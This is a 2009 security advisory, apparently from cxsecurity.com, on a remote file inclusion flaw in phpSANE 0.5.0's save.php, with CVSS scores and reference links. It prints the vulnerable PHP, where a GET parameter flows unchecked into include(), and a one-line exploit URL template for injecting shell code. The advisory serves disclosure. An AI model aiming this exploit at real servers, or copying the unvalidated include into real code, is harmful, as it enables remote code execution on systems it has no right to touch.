phpSANE 0.5.0 (save.php) Remote File Inclusion Vulnerability

2009-09-16 / 2009-09-17
Credit: CoBRa_21
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------------------------------------------- phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------- Author: CoBRa_21 Mail: uyku_cu@windowslive.com Script Download:http://sourceforge.net/projects/phpsane/ Dork: Yok :P ----------------------------------------------------------------------------------- BUG <?PHP include("language.php"); $file_save = $_GET['file_save']; $file_save_image = $_GET['file_save_image']; $lang_id = $_GET['lang_id']; if ($file_save_image) { echo "<p class=\"align_center\">\n"; echo "<img src=\"".$file_save."\" border=\"2\">\n"; echo "</p>\n"; } else { // my_pre my_mono echo "<p class=\"my_pre\">\n"; include($file_save); echo "</p>\n"; echo "<hr>\n"; } ----------------------------------------------------------------------------------- Exploit http://localhost/path/save.php?file_save= (Shell Code)

References:

http://www.vupen.com/english/advisories/2009/2436
http://www.milw0rm.com/exploits/9533
http://secunia.com/advisories/36476


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top